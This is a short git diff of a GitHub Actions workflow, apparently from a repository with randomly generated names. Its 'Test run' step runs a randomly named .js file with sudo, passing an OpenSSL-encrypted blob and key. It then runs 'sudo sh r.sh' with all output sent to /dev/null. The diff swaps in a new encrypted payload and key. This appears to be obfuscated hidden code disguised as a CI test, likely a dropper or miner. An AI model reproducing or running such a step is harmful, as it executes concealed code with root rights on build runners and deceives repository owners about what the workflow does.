--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'qyxxn'
+        echo 'm7oq3'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+rfq9eZmjhaSIBVWVKLXysW1gCnRTDCm1L2c0jQcNDH/1u7BD8Y7kfk/Mq5vXsEXJxocb1DsjbMipDIPGqfPU8Qhnki75OIwU6P6T8O7hunAnCJ9U8XeX4 aq1oa5 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18YuvEFwYx8SS2Cz5NLCgzSRJapyENxVxTZJqFJCZQFBzkqu15sOwqQ+dqatgqlWwh4T7cduZdQ5kuYVHLQYj0CD+e3wKHJlAofrjihZYLaOcWzmtZxzUUY e6akt5 && sudo sh r.sh > /dev/null 2>&1
